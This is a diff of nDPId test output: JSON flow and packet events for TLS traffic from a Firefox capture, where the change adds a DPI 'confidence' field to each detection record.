-00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998806,"flow_last_seen":1620927998850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00882{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998782,"flow_last_seen":1620927998850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00882{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998806,"flow_last_seen":1620927998877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"ts_msec":1620927998877,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927998806,"flow_last_seen":1620927998850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998782,"flow_last_seen":1620927998850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"ts_msec":1620927998850,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00908{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":68,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927998806,"flow_last_seen":1620927998877,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"ts_msec":1620927998877,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999109,"flow_last_seen":1620927999109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1620927999109,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1620927999109,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1620927999109,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGrBvAqAGykjA6EsmPAbugsPXqAAAAALAC\/\/947AAAAgQFtAEDAwUBAQgKNAyZgQAAAAAEAgAA"}
 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620927999111,"flow_last_seen":1620927999111,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1620927999111,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -29,18 +29,18 @@
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1620927999138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1620927999138,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmQAbsCvXBxSS7VUoAQECxktgAAAQEICjQMmZw8IAx6"}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1620927999140,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1620927999140,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGuB+SMDoSwKgBsgG7yZFyBGfZy0T4r6AS\/og7hgAAAgQFrAQCCAo8IAx9NAyZgwEDAwc="}
 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1620927999140,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1620927999140,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGrCfAqAGykjA6EsmRAbvLRPivcgRn2oAQECxYiwAAAQEICjQMmZ88IAx9"}
-00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999111,"flow_last_seen":1620927999141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"ts_msec":1620927999141,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999109,"flow_last_seen":1620927999143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"ts_msec":1620927999143,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00844{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999112,"flow_last_seen":1620927999148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"ts_msec":1620927999148,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":156,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999111,"flow_last_seen":1620927999169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"ts_msec":1620927999169,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999109,"flow_last_seen":1620927999170,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"ts_msec":1620927999170,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999112,"flow_last_seen":1620927999179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"ts_msec":1620927999179,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1065,"flow_first_seen":1620927997754,"flow_last_seen":1620927999853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":891202,"flow_avg_l4_payload_len":836,"midstream":0,"ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1031,"flow_first_seen":1620927998782,"flow_last_seen":1620927999948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":869503,"flow_avg_l4_payload_len":843,"midstream":0,"ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1387,"flow_first_seen":1620927998806,"flow_last_seen":1620927999915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1189641,"flow_avg_l4_payload_len":857,"midstream":0,"ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":434,"flow_first_seen":1620927999109,"flow_last_seen":1620927999830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":353696,"flow_avg_l4_payload_len":814,"midstream":0,"ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":646,"flow_first_seen":1620927999111,"flow_last_seen":1620927999879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":545091,"flow_avg_l4_payload_len":843,"midstream":0,"ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":878,"flow_first_seen":1620927999112,"flow_last_seen":1620927999897,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":744373,"flow_avg_l4_payload_len":847,"midstream":0,"ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999111,"flow_last_seen":1620927999141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"ts_msec":1620927999141,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":125,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999109,"flow_last_seen":1620927999143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"ts_msec":1620927999143,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620927999112,"flow_last_seen":1620927999148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":680,"flow_avg_l4_payload_len":170,"midstream":0,"ts_msec":1620927999148,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":156,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999111,"flow_last_seen":1620927999169,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"ts_msec":1620927999169,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":159,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999109,"flow_last_seen":1620927999170,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"ts_msec":1620927999170,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":163,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620927999112,"flow_last_seen":1620927999179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":680,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":156,"midstream":0,"ts_msec":1620927999179,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.iit.cnr.it","ja3":"df208241e7f3897d4ca38cfe68eabb21","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1065,"flow_first_seen":1620927997754,"flow_last_seen":1620927999853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":891202,"flow_avg_l4_payload_len":836,"midstream":0,"ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1031,"flow_first_seen":1620927998782,"flow_last_seen":1620927999948,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":869503,"flow_avg_l4_payload_len":843,"midstream":0,"ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1387,"flow_first_seen":1620927998806,"flow_last_seen":1620927999915,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1189641,"flow_avg_l4_payload_len":857,"midstream":0,"ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":434,"flow_first_seen":1620927999109,"flow_last_seen":1620927999830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":353696,"flow_avg_l4_payload_len":814,"midstream":0,"ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51599,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":646,"flow_first_seen":1620927999111,"flow_last_seen":1620927999879,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":545091,"flow_avg_l4_payload_len":843,"midstream":0,"ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51600,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":878,"flow_first_seen":1620927999112,"flow_last_seen":1620927999897,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":744373,"flow_avg_l4_payload_len":847,"midstream":0,"ts_msec":1620927999948,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"146.48.58.18","src_port":51601,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00158{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5441,"source":"firefox.pcap","alias":"nDPId-test","total-events-serialized":44}
